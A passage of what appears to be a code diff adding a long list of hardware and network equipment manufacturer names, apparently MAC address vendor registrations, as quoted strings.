Co.,Ltd.", + "Shanghai Baud Data Communication Co.,Ltd.", + "Collinear Networks Inc.", + "Beijing Yunyi Times Technology Co,.Ltd", + "Soarnex", + "frogblue TECHNOLOGY GmbH", + "Foxtech", + "Boyoung Tech", + "storONE", + "Ping Communication", + "ARQ Digital LLC", + "InnosiliconTechnology Ltd", + "LEO Innovation Lab", + "Theissen Training Systems, Inc.", + "Nanjing Bangzhong Electronic Commerce Limited", + "Thermo Fisher Scientific Messtechnik GmbH", + "SHIFT GmbH", + "Holtek Semiconductor Inc.", + "Dawon Dns", + "Xaptec GmbH", + "Carnegie Technologies", + "At&T", + "Xi'an Clevbee Technology Co.,Ltd", + "Pal Mohan Electronics Pvt Ltd", + "The Furukawa Electric Co., Ltd", + "Pegatron Corporation", + "Yanfeng Visteon Electronics Technology (Shanghai) Co.,Ltd.", + "Jiangsu Miter Technology Co.,Ltd.", + "Alcatel-Lucent Shanghai Bell Co., Ltd", + "Seagate Cloud Systems Inc", + "Beghelli S.p.a", + "Cambridge Industries(Group) Co.,Ltd.", + "Genexis B.V.", + "Jingsheng Technology Co., Ltd.", + "Blue Danube Systems, Inc", + "Lytx", + "UpdateLogic Inc.", + "RtBrick Inc.", + "WyTec International, Inc.", + "Comtrend Corporation", + "Plantronics, Inc.", + "Qiku Internet Network Scientific (Shenzhen) Co., Ltd", + "HYPERCHIP Inc.", + "Daehap Hyper-Tech", + "Hdsn", + "WOXTER TECHNOLOGY Co. Ltd", + "Hangzhou Royal Cloud Technology Co., Ltd", + "Diversey Inc", + "Prime Motion Inc.", + "Shanghai Winner Information Technology Co.,Inc", + "Ubicquia LLC", + "PowerChord Group Limited", + "WiSilica Inc", + "CTE International srl", + "Novartis Pharma AG", + "Ardomus Networks Corporation", + "Enovation Controls", + "dit Co., Ltd.", + "Dell EMC", + "Unifiedgateways India Private Limited", + "Hisense Electric Co.,Ltd", + "ColorTokens, Inc.", + "InShow Technology", + "Latch", + "Sichuan Changhong Electric Ltd.", + "Shenzhen One-Nine Intelligent Electronic Science and Technology Co., Ltd", + "National Datacomputer", + "AVM GmbH", + "Formike Electronic Co., Ltd", + "Tailyn Technologies Inc", + "Inphi Corporation", + "Magna Technology SL", + "NEC Personal Computers, Ltd.", + "Shenzhen RB-LINK Intelligent Technology Co.Ltd", + "Tnk Co.,Ltd", + "Redpine Signals, Inc.", + "Vivint Wireless Inc.", + "York Instruments Ltd", + "Shanghai Wellpay Information Technology Co., Ltd", + "Shenzhen TCL New Technology Co., Ltd", + "Silicon Graphics", + "UNINET Co.,Ltd.", + "Nubia Technology Co.,Ltd.", + "KYOCERA Display Corporation", + "Analog Devices, Inc.", + "Schneider Electric Fire & Security Oy", + "Continental Intelligent Transportation Systems LLC", + "National Narrowband Network Communications Pty Ltd", + "Panasonic Corporation AVC Networks Company", + "Panasonic Mobile Communications Co.,Ltd.", + "Panasonic Communications Co., Ltd.", + "Semptian Co., Ltd.", + "Lear Corporation GmbH", + "Philips Lifeline", + "Hon Hai Precision Ind. Co.,Ltd.", + "BKAV Corporation", + "Fichet Securite Electronique", + "Blonder Tongue Laboratories, Inc", + "Nokia Danmark A/S", + "Pro Co Sound Inc", + "Digi I's Ltd", + "Gilat Satellite Networks, Ltd.", + "Frontiir Co. Ltd.", + "CoreEdge Networks Co., Ltd", + "Phyllis Co., Ltd.", + "Actlas Inc.", + "Airista Flow, Inc.", + "Yi chip Microelectronics (Hangzhou) Co., Ltd", + "Jiangsu dewosi electric co., LTD", + "Vizeo", + "Tenda Technology Co.,Ltd.Dongguan branch", + "Syrotech Networks. Ltd.", + "PayPal, Inc.", + "Emergent Electronics", + "Shenzhen Hoin Internet Technology Co., Ltd", + "Qingdao Hisense Communications Co.,Ltd.", + "Hill-Rom", + "ERCO Leuchten GmbH", + "Essential Products, Inc.", + "Platina Systems Inc.", + "Shenzhen Zeroone Technology CO.,LTD", + "Chengdu Povodo Electronic Technology Co., Ltd", + "VIDEOR E. Hartig GmbH", + "Tvt Co.,Ltd", + "Racktivity", + "Mojo Networks, Inc.", + "Zhi Yuan Electronics Co., Limited", + "Pepxim International Limited", + "C.o.b.o. Spa", + "NEOLAB Convergence", + "Shanghai UMEinfo CO.,LTD.", + "Sius Ag", + "JM-DATA GmbH", + "Shen Zhen Lite Star Electronics Technology Co., Ltd", + "profichip GmbH", + "NTmore.Co.,Ltd", + "Philips", + "A2UICT Co.,Ltd.", + "Hotway Technology Corporation", + "Electronic Technology Inc.", + "SPG Controls", + "NTI co., ltd.", + "Shenzhen Kezhonglong Optoelectronic Technology Co.,Ltd", + "Allied Telesyn Inc.", + "QingDao Hiphone Technology Co,.Ltd", + "Insta Elektro GmbH", + "Preh Car Connect GmbH", + "Symbolic IO", + "Chant Sincere Co.,Ltd", + "Alcatel-Lucent", + "Availink, Inc.", + "HUGH SYMONS CONCEPT Technologies Ltd.", + "Heliospectra AB", + "Ubiqam", + "Shenzhen ECOM Technology Co. Ltd", + "SonicSensory,Inc.", + "Cav. Uff. Giacomo Cimberio S.p.A.", + "Le Shi Zhi Xin Electronic Technology (Tianjin) Limited", + "Shanghai Clouder Semiconductor Co.,Ltd", + "Hongkong Nano IC Technologies Co., Ltd", + "Weber-Stephen Products LLC", + "COT GmbH", + "Brilliant Home Technology, Inc.", + "Chongqing Huijiatong Information Technology Co., Ltd.", + "Hangzhou H3C Technologies Co., Limited", + "Rockeetech Systems Co.,Ltd.", + "NAKAYO Inc", + "Comat AG", + "Light Labs, Inc.", + "Deutsche Aerospace Ag", + "Udino srl", + "Dragino Technology Co., Limited", + "Bostex Technology Co., LTD", + "JCT Healthcare", + "CoreOS", + "InnoVISION Multimedia Ltd.", + "CONTROLtronic GmbH", + "Beijing Haitai Fangyuan High Technology Co,.Ltd.", + "Top Victory Electronics (Taiwan) Co., Ltd.", + "ShenZhen Figigantic Electronic Co.,Ltd", + "CONELCOM GmbH", + "Super Micro Computer, Inc.", + "Globalnet Communications", + "Youngbo Engineering Inc.", + "Lytro, Inc.", + "Eltex Enterprise Ltd.", + "Inhand Electronics, Inc.", + "Shenzhen Progress&Win Technology Co.,Ltd", + "Smart iBlue Technology Limited", + "Hello Inc.", + "HTC Corporation", + "Interexport Telecomunicaciones S.A.", + "Ningbo Bird Co.,Ltd.", + "Bluegiga Technologies OY", + "Sumavision Technologies Co.,Ltd", + "ShenZhen ZhongRuiJing Technology co.,LTD", + "Shenzhen Fast Technologies Co.,Ltd", + "Lartech telecom LLC", + "Shenzhen Super D Technology Co., Ltd", + "SENTRY Co., LTD.", + "NovAtel Inc.", + "Ncse", + "LOCOSYS Technology Inc.", + "CorEdge Networks, Inc.", + "SURE SYSTEM Co Ltd", + "Shenzhen Twowing Technologies Co.,Ltd.", + "Luma Home", + "Nova Electronics (Shanghai) Co., Ltd.", + "ViewSonic Corporation", + "Shenzhen Vsun Communication Technology Co., Ltd.", + "Vanderbilt International (SWE) AB", + "White Sky Inc. Limited", + "TEM Mobile Limited", + "Belkin International Inc.", + "Bucher Automation AG", + "NorthStar Battery Company, LLC", + "Beijing Zhoenet Technology Co., Ltd", + "Hong Kong Wheatek Technology Limited", + "Kmdata Inc.", + "Digitro Tecnologia Ltda", + "T.E.M.A. S.p.A.", + "Robert Bosch Smart Home GmbH", + "Wi-NEXT, Inc.", + "Samsung Electro Mechanics Co., Ltd.", + "Communication Networks, LLC", + "SHENZHEN SPOTMAU INFORMATION TECHNOLIGY CO., Ltd", + "Licera AB", + "Wuxi Keboda Electron Co.Ltd", + "e-Smart Systems Pvt. Ltd", + "Xiamen Intretech Inc.", + "CNB Technology Inc.", + "Objenious", + "Bull Group Co., Ltd", + "Ultra Electronics Sonar System Division", + "Visonic Technologies 1993 Ltd.", + "Xircom", + "XAVi Technologies Corp.", + "Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd", + "Novell, Inc.", + "Mach Power, Rappresentanze Internazionali s.r.l.", + "ExperData", + "Nortel Networks", + "Sonnet Technologies, Inc", + "Parrot Sa", + "Shandong Intelligent Optical Communication Development Co., Ltd.", + "Kasda Networks Inc", + "Skyworth Overseas Development Ltd.", + "ProCurve Networking by HP", + "Printer Systems Corp.", + "Posdata", + "Shanghai DareGlobal Technologies Co.,Ltd", + "Control Solutions LLC", + "A2B Electronics AB", + "Widex A/S", + "Lg Electronics Inc", + "Alcatel Bell Space N.V.", + "FDT Technologies", + "Raycom CO ., LTD", + "Hightech", + "Intelicis Corporation", + "Qualcomm Inc.", + "QLogic Corporation", + "Qisda Corporation", + "BlueAnt Wireless", + "Quantify Technology Pty. Ltd.", + "ORTHOsoft inc, d/b/a Zimmer CAS", + "JMR Electronics, Inc", + "ITALTEL S.p.A/RF-UP-I", + "Shanghai Nanchao Information Technology", + "Renex Corporation", + "Wistron Infocomm (Zhongshan) Corporation", + "Toshiba", + "Vocollect Inc", + "Vizio, Inc", + "Telco Systems, Inc.", + "Cisco-Linksys, LLC", + "Mobiwire Mobiles (Ningbo) Co.,Ltd", + "Shenzhen Smart Intelligent Technology Co.Ltd", + "INDUSNET Communication Technology Co.,LTD", + "Q-Lab Corporation", + "Smartchip Integrated Inc.", + "Raptor Engineering, LLC", + "Sanford LP", + "Augtek", + "Riverbed Technology, Inc.", + "Baltic Latvian Universal Electronics LLC", + "Yokote Seiko Co., Ltd.", + "Qibixx AG", + "VXi Corporation", + "Zhuhai Ewpe Information Technology Inc", + "Cocoon Alarm Ltd", + "Will i-tech Co., Ltd.", + "Ge", + "Sentrus Government Systems Division, Inc", + "Lih Rong electronic Enterprise Co., Ltd.", + "Konka Group Co., Ltd.", + "Gastron Co., LTD.", + "TEAC Corp. R& D", + "Natural Security SAS", + "Kingston Technology Company, Inc.", + "JAVAD GNSS, Inc.", + "Jastec", + "Jabil Circuit(Wuxi) Co.,Ltd", + "Neotech", + "Commend International GmbH", + "PACE Telematics GmbH", + "Vitec", + "International Computers, Ltd", + "Elitegroup Computer Systems Co.,Ltd.", + "Emulex Corporation", + "Valmet Automation", + "Sgsg Science & Technology Co. Ltd", + "Cambridge Medical Robotics Ltd", + "Olym-tech Co.,Ltd.", + "Ecocentric Energy", + "Moen", + "ECI Telecom Ltd.", + "Xiangshan Giant Eagle Technology Developing Co., Ltd.", + "Edimax Technology Co. Ltd.", + "RadiAnt Co.,Ltd", + "Astro Gaming", + "Tedipay UK Ltd", + "Phison Electronics Corp.", + "Jiangsu Yinhe Electronics Co.,Ltd.", + "Yamaha Corporation", + "SPnS Co.,Ltd", + "Beijing Unis HengYue Technology Co., Ltd.", + "Invenit BV", + "shenzhen Biocare Bio-Medical Equipment Co.,Ltd.", + "Beijing E3Control Technology Co, LTD", + "moobox CO., Ltd.", + "NetApp", + "Partow Tamas Novin (Parman)", + "KunTeng Inc.", + "Lumenpulse", + "Sonova AG", + "TCL King Electrical Appliances (Huizhou) Co., Ltd", + "Libre Wireless Technologies Inc.", + "Canon Inc.", + "Starry, Inc.", + "Technicolor Delivery Technologies Belgium NV", + "Data Recall Ltd.", + "Cabletron Systems, Inc.", + "Nantworks", + "Brother industries, LTD.", + "Cardiac Recorders, Inc.", + "Canoga Perkins Corporation", + "Roku, Inc.", + "Shenzhen JingHanDa Electronics Co.Ltd", + "MTI Ltd.", + "BaudTec Corporation", + "Barnes&Noble", + "Aztech Electronics Pte Ltd", + "Allwinner Technology Co., Ltd", + "Arcadyan Technology Corporation", + "ARIMA Communications Corp.", + "BlackBerry RTS", + "SEAWING Kft", + "AirTies Wireless Networks", + "Shenzhen Jun Kai Hengye Technology Co. Ltd", + "ADB Broadband Italia", + "AcSiP Technology Corp.", + "Accton Technology Corp", + "Qingdao Santong Digital Technology Co.Ltd", + "Alpha Networks Inc.", + "Allied Telesis, Inc.", + "Agilent Technologies, Inc.", + "Wingtech Group (HongKong)Limited", + "Airenetworks", + "Fr. Sauter AG", + "MagnaCom", + "2Wire Inc", + "D-Link Corporation", + "Cadence Design Systems, Inc.", + "Harbin Arteor technology co., LTD", + "Hefei Toycloud Technology Co.,ltd", + "Shenzhen Xinguodu Technology Co., Ltd.", + "Jide Technology (Hong Kong) Limited", + "Fuze Entertainment Co., ltd", + "Currant, Inc.", + "NXP Semiconductors", + "Microsoft Mobile Oy", + "Exceptional Innovation, Inc.", + "Fengfan (BeiJing) Technology Co., Ltd.", + "SNK Technologies Co.,Ltd.", + "razberi technologies", + "WyreStorm Technologies Ltd", + "Brocade Communications Systems LLC", + "Shanghai Feixun Communication Co.,Ltd.", + "Cisco SPVTG", + "Comark Interactive Solutions", + "Pioneer Corporation", + "Thai Habel Industrial Co., Ltd.", + "Bita", + "Holley Metering Limited", + "Feit Electric Company, Inc.", + "LM Technologies Ltd", + "Smartcom - Bulgaria AD", + "Wuxi Sky Chip Interconnection Technology Co.,Ltd.", + "Shanghai Wind Technologies Co.,Ltd", + "Real Vision Technology Co.,Ltd.", + "Poynt Co.", + "iPort", + "Yaojin Technology (Shenzhen) Co., LTD.", + "TRP Systems BV", + "PLUMgrid Inc", + "Midea Group Co., Ltd.", + "Circle Media Inc", + "Technomate Ltd", + "Intrising Networks, Inc.", + "Hilan Technology CO.,LTD", + "KingTing Tech.", + "Baicells Technologies Co.,LTD", + "P2 Mobile Technologies Limited", + "Shanghai MRDcom Co.,Ltd", + "ROLI Ltd.", + "RetailNext", + "RF Technology Pty Ltd", + "Anov France", + "Nanjing Putian Telecommunications Technology Co.,Ltd.", + "WOORISYSTEMS CO., Ltd", + "Anaren Microwave, Inc.", + "Everysight LTD.", + "Esan electronic co.", + "NewSharp Technology(SuZhou)Co,Ltd", + "Innatech Sdn Bhd", + "Mega Video Electronic(HK) Industry Co., Ltd", + "Shenzhen Seavo Technology Co.,Ltd", + "Shenzhen CareDear Communication Technology Co.,Ltd", + "Topwise 3G Communication Co., Ltd.", + "Lenovo Mobile Communication (Wuhan) Company Limited", + "Instituto Nacional de Tecnología Industrial", + "Array Networks", + "Logi-D inc", + "Cambrionix Ltd", + "Tempered Networks, Inc.", + "Sartura d.o.o.", + "Polycom", + "Xiamen Meitu Mobile Technology Co.ltd", + "Mios Elettronica Srl", + "Honeywell (China) Co., LTD", + "Hangzhou Silan Microelectronic Inc", + "Shenzhen Bococom Technology Co.,LTD", + "Wiio, Inc.", + "Xiamen DNAKE Technology Co.,Ltd", + "Melec Inc.", + "Shanghai Xiaoyi Technology Co., Ltd.", + "RFI Engineering", + "Rosonix Technology, Inc.", + "Visionscape Co,. Ltd.", + "Itt Llc", + "Keisokuki Center Co.,Ltd.", + "KodaCloud Canada, Inc", + "LVS Co.,Ltd.", + "Shenzhen Jehe Technology Development Co., Ltd.", + "Egardia", + "Huizhou Maorong Intelligent Technology Co.,Ltd", + "Fiber Mountain Inc.", + "Teledyne DALSA Professional Imaging", + "Baikal Electronics JSC", + "Shenzhen Homecare Technology Co.,Ltd.", + "FUJIFILM Business Innovation Corp.", + "Todaair Electronic Co., Ltd", + "Avotek corporation", + "Vaillant GmbH", + "Shenzhen Zhilu Technology Co.,Ltd", + "1Verge Internet Technology (Beijing) Co., Ltd.", + "Tele system communication", + "Igneous Systems", + "Stateless Networks", + "Pi-Coral", + "Zimi Corporation", + "Shenzhen Spacetek Technology Co.,Ltd", + "nimbus 9, Inc", + "360 Fly Inc.", + "Shenzhen Juchin Technology Co., Ltd", + "Vubiq Networks, Inc.", + "Mobile Create Co.,Ltd.", + "Qsc Ag", + "Toyoshima Electric Technoeogy(Suzhou) Co.,Ltd.", + "deister electronic GmbH", + "Leeo Inc", + "Loxley Public Company Limited", + "Micro-Star INTL CO., LTD.", + "Yaojin Technology(Shenzhen)Co.,Ltd", + "Netzin Technology Corporation,.Ltd.", + "OneAccess SA", + "Cybo Co.,Ltd.", + "Sonar Industrial Co., Ltd.", + "Prosoft Systems LTD", + "Total Phase", + "Step forward Group Co., Ltd.", + "V.P.S. Thai Co., Ltd", + "Jiangsu Huitong Group Co.,Ltd.", + "Shenzhen Yourf Kwan Industrial Co., Ltd", + "Zhejiang KaNong Network Technology Co.,Ltd.", + "Pro Concept Manufacturer Co.,Ltd.", + "Cathay Communication Co.,Ltd", + "Power Dragon Development Limited", + "Greenvity Communications", + "Kinetek Sports", + "Electronics Company Limited", + "Scientech Materials Corporation", + "UCI Corporation Co.,Ltd.", + "Vuzix / Lenovo", + "mira fitness,LLC.", + "Shanghai Tigercel Communication Technology Co.,Ltd", + "Shanghai Huaqin Telecom Technology Co.,Ltd", + "Intelbras", + "Bq", + "Dongguan Hele Electronics Co., Ltd", + "Shenzhen Doov Technology Co.,Ltd", + "RayTight", + "NASCENT Technology, LLC - RemKon", + "CTS Limited", + "Core Logic Inc.", + "Silca Spa", + "Ability enterprise co.,Ltd.", + "Shenzhen Jin Yun Video Equipment Co., Ltd.", + "Ip-Line", + "NovaComm Technologies Inc.", + "Advan", + "iRule LLC", + "Belden Hirschmann Industries (Suzhou) Ltd.", + "Rockport Networks Inc", + "IMS Messsysteme GmbH", + "Ulterius Technologies, LLC", + "Hagleitner Hygiene International GmbH", + "Smartisan Technology Co., Ltd.", + "Shenzhen TG-NET Botone Technology Co.,Ltd.", + "Corsa Technology Incorporated", + "Luminate Wireless", + "Sify Technologies Ltd", + "M2Communication Inc.", + "DEXON Systems Ltd.", + "Pointer Telocation Ltd", + "Apacer Technology Inc.", + "Tek-Air Systems, Inc.", + "Open-m technology limited", + "Tabuchi Electric Co.,Ltd", + "Life Fitness / Div. of Brunswick", + "eZEX corporation", + "Shenzhen Pulier Tech CO.,Ltd", + "Chiyoda Electronics Co.,Ltd.", + "Cynny Italia S.r.L.", + "A3M Co., LTD", + "Shenzhen Elink Technology Co., LTD", + "noax Technologies AG", + "Flight Data Systems", + "Nanjing Glarun Atten Technology Co. Ltd.", + "Ubiquoss Inc", + "Shenzhen SEI Robotics Co.,Ltd", + "tado GmbH", + "Huizhou Super Electron Technology Co.,Ltd.", + "Cool Control LTD", + "IVT Electronic Co.,Ltd", + "Optek Digital Technology company limited", + "Shanghai Diveo Technology Co., Ltd", + "Guangdong Tonze Electric Co.,Ltd", + "Geomodeling Wuxi Technology Co. Ltd.", + "Shenzhen MIMOWAVE Technology Co.,Ltd", + "Westunitis Co., Ltd.", + "HDMI Licensing, LLC", + "Keystone Microtech Corporation", + "Transbit Sp. z o.o.", + "R L Drake", + "Avire Global Pte Ltd", + "Akenori PTE Ltd", + "Global Regency Ltd", + "Foster Electric Company, Limited", + "Hd Digital Tech Co., Ltd.", + "Blue Clover Devices", + "DEI Sales, Inc.", + "Topicon HK Lmd.", + "NietZsche enterprise Co.Ltd.", + "EnvyLogic Co.,Ltd.", + "Newport Media Inc.", + "Realfiction ApS", + "UTStarcom (China) Co.,Ltd", + "All Components Incorporated", + "Mita-Teknik A/S", + "MTN Electronic Co. Ltd", + "TXTR GmbH", + "Dune Hd Ltd", + "TerraSem Co.,Ltd", + "Bmeye B.v.", + "Verto Medical Solutions, LLC", + "BTB Korea INC", + "General Electric Water & Process Technologies", + "Vers Inc", + "Logipix Ltd", + "SwiftTest, Inc.", + "LRE Medical GmbH", + "Ilshin Elecom", + "Global Apps Corp.", + "Paradox Engineering SA", + "SIFROM Inc.", + "I4vine, Inc", + "C.e. Electronics, Inc", + "Ragentek Technology Group", + "Canopus Systems US LLC", + "Onyx Healthcare Inc.", + "AxesNetwork Solutions inc.", + "Coho Data, Inc.,", + "Far South Networks", + "Neets", + "RHEWA-WAAGENFABRIK August Freudewald GmbH &Co. KG", + "Progeny Systems", + "Unmonday Ltd", + "Magneti Marelli Automotive Electronics (Guangzhou) Co. Ltd", + "iDevices, LLC", + "CZ.NIC, z.s.p.o.", + "Ibc Technologies Inc.", + "Elno", + "AKG Acoustics GmbH", + "Paterson Technology", + "TurControlSystme AG", + "GreenPriz", + "SpotCam Co., Ltd.", + "Simac Techniek NV", + "WaveIP", + "Shenzhen Hualistone Technology Co.,Ltd", + "Inspire Tech", + "Guangzhou Juzing Technology Co., Ltd", + "Micro-Star INT'L CO., LTD.", + "ASCO Numatics GmbH", + "Vossloh-Schwabe Deutschland GmbH", + "EDP Servicos", + "Voxtronic Austria", + "base Co.,Ltd.", + "Vifa Denmark A/S", + "Shenzhen JSR Technology Co.,Ltd.", + "Sunbow Telecom Co., Ltd.", + "Intertech", + "Toyou Feiji Electronics Co., Ltd.", + "Iders Incorporated", + "H.k Zongmu Technology Co., Ltd.", + "Sensorist ApS", + "Nanjing SAC Power Grid Automation Co., Ltd.", + "NuCom HK Ltd.", + "Armtel Ltd.", + "Scle Sfe", + "Game Technologies SA", + "ShanDong Tecsunrise Co.,Ltd", + "AE REFUsol", + "Shenzhen Coship Electronics Co., Ltd.", + "Optowiz Co., Ltd", + "Ark Infosolutions Pvt Ltd", + "Linkcom", + "VidaBox LLC", + "Saab AB (publ)", + "Noxus(Beijing) Technology Co.,Ltd", + "wi2be Tecnologia S/A", + "Benchmark Electronics Romania SRL", + "Ypsomed AG", + "Adaptrum Inc.", + "Softlink Automation System Co., Ltd", + "ESEN Optoelectronics Technology Co.,Ltd.", + "Shenzhen YOOBAO Technology Co.Ltd", + "Peraso Technologies", + "Intercon Systems Co., Ltd.", + "Captivate Network", + "E3 Technology, Inc.", + "Glen Dimplex Nordic as", + "Flextronics International", + "Henan Lanxin Technology Co., Ltd", + "Koncar Electronics and Informatics", + "PeopleNet Communication", + "YAZAKI Energy System Corporation", + "Vivago Oy", + "SanLogic Inc", + "Platan sp. z o.o. sp. k.", + "Orbit Irrigation", + "Pica8, Inc.", + "Znv", + "Eukrea Electromatique Sarl", + "SF Software Solutions", + "ODA Technologies", + "New Light Led", + "Sino Prime-Tech Limited", + "exlar corp", + "TIANJIN Golden Pentagon Electronics Co., Ltd.", + "Qsono Electronics Co., Ltd", + "Sichuan Bihong Broadcast & Television New Technologies Co.,Ltd", + "Shine Profit Development Limited", + "ChengDu JiaFaAnTai Technology Co.,Ltd", + "Inventum Technologies Private Limited", + "ThinPAD Technology (Shenzhen)CO.,LTD", + "ITW GSE ApS", + "Cuciniale GmbH", + "Road-Track Telematics Development", + "Thales UK Limited", + "Jiangsu Switter Co., Ltd", + "Zhejiang Kangtai Electric Co., Ltd.", + "Malgn Technology Co., Ltd.", + "Iskratel d.o.o.", + "Mini-Circuits", + "Micro Technic A/S", + "Elo touch solutions", + "Denwa Technology Corp.", + "Silverflare Ltd.", + "Explorer Hypertech Co.,Ltd", + "SkyHawke Technologies, LLC.", + "Shenzhen Xiaoniao Technology Co.,Ltd", + "Soundmatters", + "RF Controls, LLC", + "Upvel", + "Lenovo Mobile Communication Technology Ltd.", + "Technonia", + "BODi rS, LLC", + "Security Expert Ltd.", + "EVIDENCE Network SIA", + "Coriant GmbH", + "Grandbeing Technology Co., Ltd", + "Innokas Group", + "SA.S.S. Datentechnik AG", + "Shenzhen Weibu Electronics Co.,Ltd.", + "Protonic Holland", + "Bosch Automotive Aftermarket", + "Beats Electronics LLC", + "In Home Displays Ltd", + "Chengdu Fuhuaxin Technology co.,Ltd", + "CHAHOO Limited", + "Guangdong East Power Co.,", + "Vibicom Communications Inc.", + "Hong Kong Tecon Technology", + "Hugo Brennenstuhl Gmbh & Co. KG.", + "MTMCommunications", + "WindowMaster A/S", + "Beijing HCHCOM Technology Co., Ltd", + "Mobitec AB", + "EFM Networks", + "ChongQing Camyu Technology Development Co.,Ltd.", + "Precision Optical Transceivers, Inc.", + "Autosales Incorporated", + "MXCHIP Company Limited", + "trivum technologies GmbH", + "IEEE 1904.1 Working Group", + "HIWIFI Co., Ltd.", + "Qts Networks", + "Zhangzhou Keneng Electrical Equipment Co Ltd", + "Shenzhen Geniatech Inc, Ltd", + "Sistemas Audiovisuales Itelsis S.l.", + "Sangshin elecom .co,, LTD", + "OMS spol. s.r.o.", + "Freestyle Technology Pty Ltd", + "Duracell Powermat", + "Information System Research Institute,Inc.", + "Shanghai Mexon Communication Technology Co.,Ltd", + "Shenzhen Shiningworth Technology Co., Ltd.", + "Fujian Sanao Technology Co.,Ltd", + "Armstrong Monitoring Corp", + "HFC Technology (Beijing) Ltd. Co.", + "Infopia Co., Ltd", + "BSH Hausgeräte GmbH", + "blackned GmbH", + "Skyera, Inc.", + "Metro Ethernet Forum", + "Lightspeed International Co.", + "Foshan Huadian Intelligent Communications Teachnologies Co.,Ltd", + "China SSJ (Suzhou) Network Technology Inc.", + "Kyokko Tsushin System CO.,LTD", + "Beijing Symtech CO.,LTD", + "E.G.O. Elektro-Ger", + "Hazemeyer", + "Cercacor Labs", + "Alert Metalguard ApS", + "FASTWEL INTERNATIONAL CO., LTD. Taiwan Branch", + "Mobileeco Co., Ltd", + "MR&D Manufacturing", + "DuroByte Inc", + "Profalux", + "IMAGO Technologies GmbH", + "Axiros GmbH", + "Q9 Networks Inc.", + "SolidRun Ltd.", + "Spectrum Medical Limited", + "Leifheit Ag", + "Act KDE, Inc.", + "Synaptics, Inc", + "Dongguan HuaHong Electronics Co.,Ltd", + "ShenZhen Konka Telecommunication Technology Co.,Ltd", + "Wonderlan (Beijing) Technology Co., Ltd.", + "Advantech Co., Ltd.", + "ELFTECH Co., Ltd.", + "Bertel S.p.a.", + "Radiant Zemax LLC", + "DFT System Co.Ltd", + "METER Group", + "Andon Health Co.,Ltd.", + "Miartech (Shanghai),Inc.", + "INTEG process group inc", + "Desay Electronics(Huizhou)Co.,Ltd", + "Hanover Displays Limited", + "J-MEX Inc.", + "Ibm", + "Arrive Systems Inc.", + "SilverNet Ltd", + "Intrakey technologies GmbH", + "Fidelix Oy", + "World Elite Technology Co.,LTD", + "Qihan Technology Co., Ltd", + "Advance Vision Electronics Co. Ltd.", + "GERP Solution", + "Shenzhen My-power Technology Co.,Ltd", + "EmFirst Co., Ltd.", + "Svyazkomplektservice, Llc", + "SAMBON PRECISON and ELECTRONICS", + "Suttle Apparatus", + "Adaptive Wireless Solutions, LLC", + "EDIC Systems Inc.", + "Tecmobile (International) Ltd.", + "Dynamics Hong Kong Limited", + "Flyaudio corporation (China)", + "Space Monkey, Inc.", + "Genmark Automation", + "SCSpro Co.,Ltd", + "Lite-On Clean Energy Technology Corp.", + "Stage Tec Entwicklungsgesellschaft für professionelle Audiotechnik mbH", + "ZPA Smart Energy a.s.", + "Shenzhen Voxtech Co.,Ltd", + "Control iD", + "Enguity Technology Corp", + "Jema Energy, Sa", + "Cheng Uei Precision Industry Co.,Ltd.", + "Tritonwave", + "VisionVera International Co., Ltd.", + "Biscotti, Inc.", + "Litemax Electronics Inc.", + "Rosewill Inc.", + "Xiamen Vann Intelligent Co., Ltd", + "Hichan Technology Corp.", + "Wuxi DSP Technologies Inc.", + "Time Interconnect Ltd", + "Ooo Rubezh Npo", + "Nimbus Data, Inc.", + "Beijing Duokan Technology Limited", + "Ad-Sol Nissin Corp", + "Finest Security Systems Co., Ltd", + "Cheetah Hi-Tech, Inc.", + "Farmage Co., Ltd.", + "Salutron Inc.", + "Really Simple Software, Inc", + "HyBroad Vision (Hong Kong) Technology Co Ltd", + "Viogem Limited", + "Long Ben (Dongguan) Electronic Technology Co.,Ltd.", + "Micro-Star Int'l Co, Ltd", + "tci GmbH", + "EnGenius Technologies, Inc.", + "Schneider Electric Asia Pacific Ltd", + "Kemppi Oy", + "I+ME Actia Informatik und Mikro-Elektronik GmbH", + "Wilocity LTD.", + "Edgewater Networks Inc", + "NetMan Co., Ltd.", + "VisSim AS", + "Mediabridge Products, LLC.", + "Orbis Systems Oy", + "Toyo Electronics Corporation", + "SMC Networks Inc", + "ULTIMATE Europe Transportation Equipment GmbH", + "Formosa Wireless Communication Corp.", + "MEMMERT GmbH + Co. KG", + "Seine Image Int'l Co., Ltd", + "Pevco", + "Baltech AG", + "Tricascade Inc.", + "K2NET Co.,Ltd.", + "Hangzhou I'converge Technology Co.,Ltd", + "Beijing Ereneben Information Technology Limited Shenzhen Branch", + "NEO Information Systems Co., Ltd.", + "iNovo Broadband, Inc.", + "Italian Institute of Technology", + "Ecosense", + "Gerdes Aktiengesellschaft", + "Tranwo Technology Co., Ltd.", + "Magneti Marelli Sistemas Electronicos Mexico", + "Topaz Co. LTD.", + "Fxi Technologies As", + "AirScape Inc.", + "Saia-Burgess Controls AG", + "Hitachi Industrial Equipment Systems Co.,Ltd", + "Linepro Sp. z o.o.", + "Panodic(ShenZhen) Electronics Limted", + "Stalmart Technology Limited", + "Triton Electronic Systems Ltd.", + "LUMINEX Lighting Control Equipment", + "Vello Systems, Inc.", + "NuLEDs, Inc.", + "Amsc", + "Acurix Networks Pty Ltd", + "Borea", + "Bless Information & Communications Co., Ltd", + "Online Security Pty. Ltd.", + "Quest Controls, Inc.", + "Minrray Industry Co.,Ltd", + "Mitsubishi Electric Corporation", + "Beijing Cyber Cloud Technology Co. ,Ltd.", + "Alcea", + "Yoshiki Electronics Industry Ltd.", + "Elektronik System i Umeå AB", + "GuangZhou Bonsoninfo System CO.,LTD", + "Amphitech", + "Alcatel-Lucent Telecom Limited", + "Shenzhen Weijiu Industry And Trade Development Co., Ltd", + "Nortek-AS", + "Teleview", + "V2com Participacoes S.a.", + "Helixtech Corp.", + "Fischer International Systems Corporation", + "Pumatronix Equipamentos Eletronicos Ltda.", + "Becker-Antriebe GmbH", + "Hawkeye Tech Co. Ltd", + "Conversion Sound Inc.", + "Syn-Tech Systems Inc", + "Ceiec Electric Technology Inc.", + "Cloudena Corp.", + "Abicom International", + "Philips Healthcare PCCI", + "Analytica GmbH", + "Ayla Networks, Inc", + "FloDesign Wind Turbine Corporation", + "voestalpine Signaling UK Ltd.", + "Systems And Electronic Development FZCO", + "LMI Technologies", + "Etronic A/S", + "Infoblox", + "Daeshin-Information Technology Co., Ltd.", + "Shenzhen Technology Co Ltd", + "SensingTek", + "China Greatwall Computer Shenzhen Co.,Ltd", + "Beijing Ereneben 